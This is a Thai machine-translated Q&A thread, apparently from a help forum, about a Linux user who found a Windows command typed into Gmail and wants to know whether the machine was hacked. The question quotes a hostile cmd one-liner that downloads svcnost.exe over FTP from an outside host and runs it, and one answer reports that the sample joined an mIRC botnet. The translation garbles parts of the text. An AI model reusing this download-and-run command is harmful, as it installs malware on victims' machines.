จะทราบได้อย่างไรว่าคอมพิวเตอร์ลีนุกซ์ของฉันถูกแฮ็ก?

พีซีที่บ้านของฉันมักจะเปิดอยู่ แต่จอภาพปิดอยู่ เย็นวันนี้ฉันกลับบ้านจากที่ทำงานและพบว่ามีความพยายามแฮ็ค: ในเบราว์เซอร์ Gmail ของฉันเปิดอยู่ (นั่นคือฉัน) แต่มันอยู่ในโหมดการเขียนโดยมีสิ่งต่อไปนี้ในTOฟิลด์:

md / c echo เปิด cCTeamFtp.yi.org 21 >> ผู้ใช้ ik & echo ccteam10 765824 >> ik & echo binary >> ik & echo รับ svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & ออกจากเสียงก้องคุณเป็นเจ้าของ

ดูเหมือนว่าฉันจะใช้รหัสบรรทัดคำสั่งของ Windows และmdจุดเริ่มต้นของรหัสรวมกับความจริงที่ว่า Gmail อยู่ในโหมดการเขียนทำให้เห็นได้ชัดว่ามีคนพยายามเรียกใช้cmdคำสั่ง ฉันเดาว่าฉันโชคดีที่จริง ๆ แล้วฉันไม่ได้ใช้ Windows บนพีซีเครื่องนี้ แต่ฉันมีคนอื่นที่ทำเช่นนั้น นี่เป็นครั้งแรกที่มีบางสิ่งเกิดขึ้นกับฉัน ฉันไม่ใช่กูรูลินุกซ์และฉันไม่ได้รันโปรแกรมอื่นนอกเหนือจาก Firefox ในขณะนั้น

ฉันแน่ใจอย่างแน่นอนว่าฉันไม่ได้เขียนสิ่งนี้และไม่มีใครในคอมพิวเตอร์ของฉัน นอกจากนี้เมื่อเร็ว ๆ นี้ฉันได้เปลี่ยนรหัสผ่าน Google ของฉัน (และรหัสผ่านอื่นทั้งหมดของฉัน) เป็นอย่างเช่นvMA8ogd7bvฉันไม่คิดว่ามีคนแฮ็คบัญชี Google ของฉัน

เกิดอะไรขึ้น? มีคนใส่การกดแป้นบนคอมพิวเตอร์ของฉันอย่างไรเมื่อไม่ใช่เครื่อง Windows เก่าของยายที่ใช้มัลแวร์มานานหลายปี แต่ติดตั้ง Ubuntu ใหม่ล่าสุด

อัปเดต:
ให้ฉันพูดถึงประเด็นและคำถาม:

• ฉันอยู่ในออสเตรียในชนบท เราเตอร์ WLAN ของฉันใช้งานWPA2 / PSKและรหัสผ่านระดับปานกลางที่ไม่ได้อยู่ในพจนานุกรม จะต้องมีกำลังดุร้ายและน้อยกว่า 50 เมตรจากที่นี่ ไม่น่าเป็นไปได้ที่จะถูกแฮ็ก
• ฉันใช้แป้นพิมพ์แบบใช้สาย USB ดังนั้นจึงไม่น่าเป็นไปได้ที่ทุกคนจะอยู่ในระยะแฮ็ค
• ฉันไม่ได้ใช้คอมพิวเตอร์ในขณะนั้น มันไม่ทำงานที่บ้านในขณะที่ฉันทำงาน มันเป็นพีซีเน็ตท็อปที่ติดตั้งจอภาพดังนั้นฉันไม่ค่อยปิด
• เครื่องมีอายุเพียงสองเดือนเท่านั้นเปิดใช้งาน Ubuntu เท่านั้นและฉันไม่ได้ใช้ซอฟต์แวร์แปลก ๆ หรือเยี่ยมชมไซต์แปลก ๆ ส่วนใหญ่จะเป็น Exchange Exchange, Gmail และหนังสือพิมพ์ ไม่มีเกม Ubuntu ได้รับการตั้งค่าให้ทันสมัยอยู่เสมอ
• ฉันไม่ทราบว่าบริการ VNC ใดทำงานอยู่ ฉันยังไม่ได้ติดตั้งหรือเปิดใช้งานอย่างแน่นอน ฉันยังไม่ได้เริ่มเซิร์ฟเวอร์อื่นใด ฉันไม่แน่ใจว่ามีสิ่งใดที่กำลังทำงานใน Ubuntu ตามค่าเริ่มต้นหรือไม่
• ฉันรู้ที่อยู่ IP ทั้งหมดในกิจกรรมบัญชีของ Gmail ฉันค่อนข้างแน่ใจว่า Google ไม่ใช่ทางเข้า
• ฉันพบโปรแกรมดูไฟล์บันทึกแต่ไม่ทราบว่าจะต้องค้นหาอะไร ช่วยด้วย?

สิ่งที่ฉันอยากรู้คืออะไรและสิ่งที่ทำให้ฉันรู้สึกไม่ปลอดภัยคือ: ทุกคนจากอินเทอร์เน็ตสามารถสร้างการกดแป้นบนเครื่องของฉันได้อย่างไร ฉันจะป้องกันได้อย่างไรโดยไม่ต้องใส่หมวกฟอยล์เกี่ยวกับมัน ฉันไม่ใช่คนที่ชอบ Linux ฉันเป็นพ่อที่ยุ่งกับ Windows มานานกว่า 20 ปีและรู้สึกเบื่อหน่าย และตลอดระยะเวลา 18 ปีของการออนไลน์ฉันไม่เคยเห็นความพยายามในการแฮ็กข้อมูลส่วนตัวดังนั้นนี่จึงเป็นเรื่องใหม่สำหรับฉัน

ฉันสงสัยว่าคุณมีอะไรต้องกังวล มันเป็นโอกาสมากกว่าการโจมตี JavaScript ที่พยายามที่จะทำไดรฟ์โดยการดาวน์โหลด หากคุณกังวลเกี่ยวกับสิ่งนี้ให้เริ่มต้นใช้Add-on NoScriptและAdBlock Plus Firefox

แม้การเข้าชมเว็บไซต์ที่น่าเชื่อถือคุณยังไม่ปลอดภัยเพราะพวกเขาเรียกใช้รหัส JavaScript จากผู้โฆษณาบุคคลที่สามที่อาจเป็นอันตราย

ฉันคว้ามันและวิ่งใน VM มันติดตั้ง mirc และนี่คือบันทึกสถานะ ... http://pastebin.com/Mn85akMk

มันคือการโจมตีแบบอัตโนมัติที่จะพยายามที่จะได้รับคุณดาวน์โหลด mIRC และเข้าร่วมบ็อตเน็ตที่จะเปลี่ยนคุณเป็นสแปม ... มันมี VM autoemail-119.west320.comของฉันเข้าร่วมและทำให้การเชื่อมต่อจำนวนที่อยู่ห่างไกลที่แตกต่างกันซึ่งหนึ่งในนั้นคือ

ใช้งานได้ใน Windows 7 ฉันต้องยอมรับพรอมต์ UAC และอนุญาตให้เข้าถึงผ่านไฟร์วอลล์

ดูเหมือนว่ามีรายงานมากมายเกี่ยวกับคำสั่งที่ถูกต้องนี้ในฟอรัมอื่นและมีคนบอกว่าไฟล์ torrent พยายามรันมันเมื่อดาวน์โหลดเสร็จแล้ว ... ฉันไม่แน่ใจว่ามันจะเป็นไปได้อย่างไร

ฉันไม่ได้ใช้สิ่งนี้ด้วยตนเอง แต่ควรจะสามารถแสดงการเชื่อมต่อเครือข่ายปัจจุบันให้คุณเพื่อให้คุณสามารถดูว่าคุณเชื่อมต่อกับสิ่งที่ไม่ได้มาตรฐาน: http://netactview.sourceforge.net/download.html

ฉันเห็นด้วยกับ@ jb48394ว่าอาจเป็นประโยชน์จาก JavaScript อย่างทุกวันนี้

ความจริงที่ว่ามันพยายามเปิดcmdหน้าต่าง(ดูความคิดเห็นของ @ torbengb )และเรียกใช้คำสั่งที่เป็นอันตรายมากกว่าเพียงแค่ดาวน์โหลดโทรจันอย่างรอบคอบในพื้นหลังแสดงให้เห็นว่ามันใช้ช่องโหว่บางอย่างใน Firefox ซึ่งทำให้สามารถป้อนรหัสได้ ไม่เรียกใช้รหัส

นอกจากนี้ยังอธิบายว่าทำไมถึงใช้ประโยชน์ซึ่งได้รับอย่างชัดเจนเขียนเฉพาะสำหรับ Windows ก็จะทำงานในลินุกซ์: Firefox รัน JavaScript ในลักษณะเดียวกันใน OS'es ทั้งหมด (อย่างน้อยก็พยายามที่จะ :)) ถ้ามันเกิดจาก buffer-overflow หรือ exploit ที่คล้ายกันสำหรับ Windows มันจะเพิ่งพังโปรแกรม

ในฐานะที่เป็นที่รหัส JavaScript มาจาก - อาจจะเป็นอันตราย Google โฆษณา(รอบโฆษณาใน Gmail ตลอดทั้งวัน) มันจะไม่ เป็น แรกเวลา

ฉันพบการโจมตีที่คล้ายกันในเครื่อง Linux เครื่องอื่น ดูเหมือนว่ามันเป็นคำสั่ง FTP บางอย่างสำหรับ Windows

สิ่งนี้ไม่ได้ตอบคำถามทั้งหมดของคุณ แต่ในการค้นหาล็อกไฟล์ล้มเหลว

rootหากมีมากกว่าประมาณห้าพยายามที่ล้มเหลวในบันทึกของคุณแล้วใครบางคนพยายามที่จะแตก หากมีความพยายามในการเข้าสู่ระบบที่ประสบความสำเร็จrootในขณะที่คุณไม่อยู่ที่คอมพิวเตอร์ให้เปลี่ยนรหัสผ่านทันที !! ฉันหมายถึงตอนนี้! ควรเป็นตัวอักษรและตัวเลขและยาวประมาณ 10 ตัวอักษร

กับข้อความที่คุณได้ (คนechoคำสั่ง) นี้จริงๆเสียงเหมือนบางคนที่ยังไม่บรรลุนิติภาวะเล็กสคริปต์ ถ้ามันเป็นแฮ็กเกอร์ตัวจริงที่รู้ว่าเขากำลังทำอะไรอยู่คุณอาจจะยังไม่รู้เกี่ยวกับมัน

whois รายงาน west320.com เป็นของ Microsoft

UPnPและVino (ระบบ -> การตั้งค่า -> เดสก์ท็อประยะไกล) รวมกับรหัสผ่าน Ubuntu ที่อ่อนแอ

คุณใช้ที่เก็บที่ไม่ได้มาตรฐานหรือไม่

DEF CONมีการแข่งขัน Wi-Fi ในแต่ละปีถึงจุดเชื่อมต่อ Wi-Fi ที่ไกลแค่ไหน - ครั้งสุดท้ายที่ฉันได้ยินมาคือ 250 ไมล์

หากคุณต้องการจริงๆที่จะต้องกลัวดูที่หน้าจอของศูนย์บัญชาการ-N-ควบคุมที่บ็อตเน็ต Zeus ไม่มีเครื่องที่ปลอดภัย แต่ Firefox บน Linux นั้นปลอดภัยกว่าส่วนที่เหลือ ยิ่งไปกว่านั้นถ้าคุณใช้SELinux